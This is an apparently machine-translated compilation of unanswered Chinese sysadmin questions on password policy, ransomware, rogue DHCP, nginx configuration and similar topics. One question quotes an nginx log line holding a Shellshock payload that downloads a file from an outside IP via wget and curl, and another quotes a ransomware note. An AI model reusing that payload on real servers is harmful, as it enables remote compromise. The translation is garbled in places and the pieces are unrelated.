我是一个小型家族企业的默认IT人员。 我们有5-10名员工,只在办公室工作了大约半年。 正因为如此,拥有唯一密码是一件痛苦的事情 – 所以人们似乎对所有机器都使用一个通用密码。 我想知道如果有人有任何build议,如何使这更安全(不需要记住密码)。 我们使用Windows机器。 login是在本地完成的。 访问中央文件服务器时,我们有Active Directory。 如果这是可取的,我们可以依靠AD。 我想也许是某种RSA或者Yubikey–只要让他们插入就可以login,然后当他们离开的时候,他们可以把密钥还给我们。 但是,作为pipe理员,我需要login到他们的机器来安装应用程序(所以我需要一个万能钥匙,或者什么)? 我会使用AD进行login,然后只是“安装在这台机器上的所有用户”? 所以也许这是两个问题? 主要问题是避免所有员工的密码。 但是相关的是,如果我没有钥匙,我怎么能login到他们的账户呢?
我的系统被恶意软件感染,不断修改特定的configuration文件。 有没有一种方法/工具来找出哪个程序正在改变一个特定的文件? 我只是寻找一个工具,可以帮助监视一个特定的文件的变化。 不是一个完全成熟的取证反应。
到目前为止,我一直在我的nginxconfiguration文件的php位置使用以下内容 try_files $uri $uri/ /index.php?$query_string; 但是,我刚刚在Wordpress Codex指南中看到,对于零日漏洞,应该使用以下内容: try_files $uri =404; 两者在安全性方面有什么区别?
我们正在build立一个包含Azure虚拟机的新networking。 我可以通过RDC连接到这个。 但是,出于安全原因,我们的安全人员希望通过第二台虚拟机访问它。 换句话说,我首先连接RDC到一个“跳转服务器”(这只是Azure中的另一个虚拟机),然后从那里使用RDC连接到第二个服务器。 这实际上是添加一个安全层? 在我看来,除非我的本地机器上的RDC以某种方式得到了病毒或被黑客攻击,否则跳跃服务器没有任何好处。
我的服务器(CentOS)最近被一些encryption黑客入侵了。 他们encryption了我所有的文件,并要求赎金解密这些文件。 他们在所有文件夹中都保存了一条消息 你的个人文件被encryption! 使用为此计算机生成的唯一公钥RSA-2048生成encryption。 要解密文件,你需要获得私钥。 私钥的单个副本,允许解密位于Internet上的秘密服务器上的文件。 之后,没有人,永远不会恢复文件… 要获得这台计算机的私钥,这将自动解密文件,您需要支付1比特币(约240美元)。 没有密钥,你将永远无法得到你的原始文件… 现在,他们已经给我发送了解密密钥,我仍然可以有人请帮助我如何恢复我的文件? 他们利用的可能的漏洞是什么? 任何其他的技巧/指针,以避免未来的威胁? 提前致谢。 编辑:他们给我一个私人密钥的PHP脚本,我应该上传到服务器,并通过一个URL运行。 这是他们发给我的解密文件。
我有一个拥有500多台电脑的networking,在我的地区有很多合作公司,有时候会自带路由器。 如果他们偷偷摸摸地做,并且不closures设备上的DHCP服务,那么很多设备会得到错误的地址,而且需要很长时间才能find它。 有没有解决办法? 我想隔离部门或build立VLAN与单独的子网。 我想也在主交换机上使用静态ARP,并把192.168.0.1和192.168.1.1条目到我的DHCP。 这是否有意义,它会以任何方式保护地址的变化?
在nginx访问日志中有很多条目。 我如何知道这些脚本的结果,以及我的服务器是否被盗用? 162.232.183.48 – – [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2 04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232 .209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-"
我有一些与openssl版本1.0.1f-1ubuntu2.16运行的prod服务器。 自2016年3月1日起,将会发布一个新的ssl版本,它将涵盖大部分的严重错误,我如何将我的prod服务器升级到最新的openssl版本?
在Arch Linux ARM(Raspberry Pi)内核4.4.37上,我创build了一个macvlan例如 ip link add link eth0 mac0 type macvlan macvlan虚拟网卡出现在列表中,所以我给它分配一个IP地址,并将链路状态设置为up。 (顺便说一下,我尝试过模式bridge , vepa和private模式。) 然后,我可以从Windows客户端ping IP,但是当我检查Windows中的ARPcaching( arp -a )时,它们显示的是与主(物理)networking适配器相同的MAC地址,而不是新创build的macvlan MAC地址。 我确定要清除ARPcaching,尝试客户端以前没有见过的IP地址等,但总是显示错误的MAC地址。 当我为macvlan MAC地址为Windows客户端创build一个静态ARP条目并ping相关的IP地址时,tcpdump显示在macvlan接口上进入的回显请求,并且在主(物理)接口上不显示任何东西,我得到了我的Windows客户端的ping响应(一旦我记得设置iptables规则,以允许交通!) 只要我清除客户端上的ARPcaching并再次ping,我仍然得到一个ping响应,但是这次ARP条目已经恢复到Linux主机上的主要物理networking适配器。 只是想知道我可能做错了什么?
我们正在pipe理一套服务器,并且有很多人来完成这个任务。 在过去的几个月里,我们的一些域pipe理员偶然在我们的机器上安装了更新。 现在我们要禁用pipe理员在我们的服务器上安装这些更新的function,并允许其为一组中的特定用户。 有谁知道一个方法来完成这个? 我已经通过组策略和安全设置进行了search,但没有发现这种可能性。 在此先感谢您所有有用的答案:)